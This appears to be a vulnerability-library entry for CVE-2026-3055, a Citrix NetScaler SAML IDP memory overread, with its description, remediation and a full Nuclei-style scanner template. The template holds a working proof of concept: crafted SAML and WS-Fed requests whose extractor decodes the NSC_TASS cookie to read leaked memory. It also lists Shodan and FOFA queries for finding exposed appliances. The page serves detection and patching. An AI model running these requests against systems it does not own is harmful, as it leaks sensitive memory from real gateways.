/Vulnerability Library

Citrix NetScaler SAML IDP - Memory Overread

CVE-2026-3055
Verified

Description

NetScaler ADC and NetScaler Gateway contain an insufficient input validation vulnerability when configured as a SAML IDP, leading to memory overread, letting attackers potentially access sensitive memory, exploit requires configuration as SAML IDP

Severity

Critical

Published Date

March 30, 2026

Template Author

watchtowr, shaikhyaser, dhiyaneshdk

CVE-2026-3055.yaml
id: CVE-2026-3055

info:
  name: Citrix NetScaler SAML IDP - Memory Overread
  author: watchtowr,shaikhyaser,DhiyaneshDk
  severity: critical
  description: |
    NetScaler ADC and NetScaler Gateway contain an insufficient input validation vulnerability when configured as a SAML IDP, leading to memory overread, letting attackers potentially access sensitive memory, exploit requires configuration as SAML IDP
  impact: |
    Attackers can cause memory overread, potentially exposing sensitive information or causing application instability.
  remediation: Update to the latest version with the fix for this vulnerability.
  reference:
    - https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696300
    - https://labs.watchtowr.com/the-sequels-are-never-as-good-but-were-still-in-pain-citrix-netscaler-cve-2026-3055-memory-overread/
    - https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/
  metadata:
    verified: true
    max-request: 2
    shodan-query:
      - title:"NetScaler Gateway"
      - title:"NetScaler AAA"
      - http.favicon.hash:-1166125415
      - http.favicon.hash:-1292923998
    fofa-query:
      - title="NetScaler Gateway"
      - title="NetScaler AAA"
      - icon_hash="-1166125415"
      - icon_hash="-1292923998"
  tags: cve,cve2026,netscaler,citrix,exposure,kev,vkev,vuln

flow: http(1) || http(2)

http:
  - raw:
      - |
        POST /saml/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip

        SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCB4bWxuczpzYW1scD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOnByb3RvY29sIiANCnhtbG5zOnNhbWw9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphc3NlcnRpb24iICANCklEPSJfMSINClZlcnNpb249IjIuMCIgUHJvdmlkZXJOYW1lPSJteSBwcm92aWRlciIgDQpEZXN0aW5hdGlvbj0iaHR0cDovL3dhdGNodG93ci9zYW1sLnBocCIgDQpQcm90b2NvbEJpbmRpbmc9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpiaW5kaW5nczpIVFRQLVBPU1QiIA0KPg0KICA8c2FtbDpJc3N1ZXI%2BaHR0cDovL3dhdGNodG93ci9zYW1sLnBocDwvc2FtbDpJc3N1ZXI%2BDQo8L3NhbWxwOkF1dGhuUmVxdWVzdD4%3D

      - |
        GET /wsfed/passive?wctx HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - regex('(?i)NSC_TASS=[A-Za-z0-9+/]+=*', set_cookie)
          - 'status_code == 302'
          - 'contains(base64_decode(nsc_tass), "wctx=")'
          - '!contains(body, "Parsing of presented Assertion failed")'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - base64_decode(nsc_tass)
# digest: 4a0a004730450220406d2dccc32a82831ddc8dfdec81d513c70d55da7324594a5ead9cdcf01a770102210086e0c3ca49f0abb8959e67730de028261f4ef59e17332d52ac062fc0e84d5a40:922c64590222798bb761d5b6d8e72950
9.5Severity

CVSS Metrics

References

https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696300https://labs.watchtowr.com/the-sequels-are-never-as-good-but-were-still-in-pain-citrix-netscaler-cve-2026-3055-memory-overread/https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/

Remediation Steps

Update to the latest version with the fix for this vulnerability.